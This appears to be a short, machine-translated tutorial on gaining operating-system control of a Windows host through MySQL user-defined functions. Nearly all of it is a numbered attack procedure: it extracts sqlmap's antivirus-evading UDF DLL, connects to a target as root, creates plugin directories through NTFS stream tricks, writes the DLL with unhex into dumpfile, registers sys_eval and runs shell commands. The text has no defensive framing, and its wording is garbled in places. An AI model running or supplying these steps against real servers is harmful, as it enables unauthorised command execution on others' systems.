MySQL UDF fetch power gain host control right

The UDF (User defined function) is an extended interface for MySQL to extend the functionality of MySQL. With MySQL administrator access, you can take advantage of this feature to gain control of your host. The following is an example of a Windows host, giving specific steps:

1. Python clock.py-d-i lib_mysqludfsys.dll

This step is to get the UDF DLL used for the attack. The first step is to install Sqlmap and then run the above command to get the UDF DLL after decoding. (Sqlmap encodes it for the avoidance of killing)

2, Mysql-h target_ip-uroot-p

Connect to target MySQL

3, select version ();

View MySQL version

4, select @ @basedir;

View the MySQL installation directory. Assumed to be C:\Program Files\mysql\mysql Server 5.1

5, select @ @plugin_dir;

View the MySQL plugin directory. Assume the C:\Program Files\mysql\mysql Server 5.1\plugin

6. Select ' It is dll ' into dumpfile ' C:\Program Files\mysql\mysql Server 5.1\lib:: $INDEX _allocation ';

Create a Lib directory

7. Select ' It is dll ' into dumpfile ' C:\Program Files\mysql\mysql Server 5.1\plugin:: $INDEX _allocation ';

Create a plugin directory

8, select Unhex (' Hex_of_udf.dll ') into DumpFile "C:\Program Files\mysql\mysql Server 5.1\plugin\udf.dll";

Create Udf.dll, the above command Hex_of_udf.dll is Udf.dll hex text, can be used Winhex and other editing software to obtain

9, create function Sys_eval returns string Soname ' Udf.dll ';

Create a function

10, select Sys_eval (' WhoAmI ');

Executes the shell command, indicating that it takes control of the operating system

MySQL UDF fetch power gain host control right